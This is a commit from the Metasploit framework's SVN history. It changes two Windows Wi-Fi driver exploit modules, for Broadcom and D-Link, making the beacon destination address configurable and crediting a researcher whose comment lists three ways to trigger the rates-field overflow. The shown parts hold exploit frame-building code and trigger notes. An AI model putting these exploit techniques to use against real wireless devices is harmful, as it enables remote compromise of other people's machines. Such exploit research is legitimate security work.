Better credit to Gil in the comments, made ADDR_DST do something

git-svn-id: file:///home/svn/framework3/trunk@4141 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/driver/broadcom_wifi_ssid.rb

@@ -153,7 +153,7 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
 		"\x80" +                      # type/subtype
 		"\x00" +                      # flags
 		"\x00\x00" +                  # duration  
-		"\xff\xff\xff\xff\xff\xff" +  # dst
+		eton(datastore['ADDR_DST']) + # dst
 		"\x58\x58\x58\x58\x58\x58" +  # src
 		"\x58\x58\x58\x58\x58\x58" +  # bssid
 		"\x70\xed" +                  # sequence number

modules/exploits/windows/driver/dlink_wifi_rates.rb

@@ -137,12 +137,15 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
 	end
 
 
+#
+# The following research was provided by Gil Dabah of ZERT
 #
 # The long rates field bug can be triggered three different ways (at least):
 # 1) Send a single rates IE with valid rates up front and long data
-# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!)
+# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
 # 3) Send two IE rates fields, with the second one containing the long data (this exploit)
 #
+ 
 	def create_beacon
 
 		ssid   = Rex::Text.rand_text_alphanumeric(6)
@@ -158,9 +161,9 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
 			"\x80" +                      # type/subtype
 			"\x00" +                      # flags
 			"\x00\x00" +                  # duration  
-			"\xff\xff\xff\xff\xff\xff" +  # dst
+			eton(datastore['ADDR_DST']) + # dst
 			src   +                       # src
-			bssid +                      # bssid
+			bssid +                       # bssid
 			seq   +                       # seq  
 			Rex::Text.rand_text(8) +      # timestamp value
 			"\x64\x00" +                  # beacon interval